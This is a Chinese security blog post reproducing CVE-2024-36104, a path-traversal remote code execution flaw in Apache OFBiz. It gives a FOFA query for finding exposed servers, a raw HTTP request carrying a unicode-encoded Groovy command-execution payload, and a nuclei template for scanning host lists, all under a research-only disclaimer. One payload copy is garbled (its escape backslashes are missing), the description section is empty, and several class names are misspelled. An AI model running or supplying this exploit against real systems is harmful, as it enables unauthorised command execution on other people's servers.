一:漏洞名称
Apache OFBiz 路径遍历导致RCE
二:漏洞描述
三:漏洞影响版本
Apache OFBiz < 18.12.14
四:网络空间测绘查询
FOFA
app="Apache_OFBiz"
五:漏洞复现
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host:
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Content-Type: application/x-www-form-urlencoded
groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b
命令执行漏洞是指恶意用户通过输入特定的命令或者数据,成功地执行了系统命令,从而导致系统受到攻击。这种漏洞通常发生在没有充分验证用户输入的情况下,将用户提供的数据直接传递给系统命令执行的场景中
nuclei.exe -t CVE-2024-36104.yaml -l host.txt
id: CVE-2024-36104 info: name: Apache OFBiz 路径遍历导致RCE author: Adler severity: info description: | Apache OFBiz(Open For Business)是一个开源的企业资源规划(ERP)系统和企业应用框架,由Apache软件基金会开发和维护。OFBiz旨在提供一套全面的企业应用解决方案,涵盖了各种业务功能,包括订单管理、库存管理、会计、人力资源、电子商务等。 该漏洞源于org.apache.otbiz.webapp.control.ControlFiter类对路径(请求URL中的特殊字符(如;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过webtools/control/ProgramExpor接囗的编程导出功能执行任意Groovy代码获取系统权限。 http: - raw: - | POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1 Host: {{Hostname}} user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Content-Type: application/x-www-form-urlencoded groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b matchers: - type: word part: body words: - uid
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论